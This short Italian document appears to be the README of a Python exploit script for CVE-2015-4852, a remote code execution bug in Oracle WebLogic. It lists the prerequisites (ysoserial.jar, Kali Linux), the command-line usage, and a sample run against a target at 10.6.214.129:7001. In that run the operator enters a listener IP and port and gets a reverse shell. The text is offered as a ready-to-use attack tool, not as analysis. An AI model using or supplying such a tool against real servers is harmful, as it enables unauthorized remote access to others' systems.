
Script di exploit Python per CVE-2015-4852 (WebLogic RCE) che utilizza payload ysoserial per ottenere accesso remoto alla shell su server WebLogic vulnerabili.
Prerequisito: è necessario posizionare ysoserial.jar nella directory dello script (rinominare ysoserial-0*.jar in ysoserial.jar), è preferibile eseguire lo script su Kali Linux
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET ip port
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
Inserisci l'indirizzo IP di ascolto: 10.6.214.1
Inserisci la porta di ascolto: 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Esecuzione riuscita
Shell ottenuta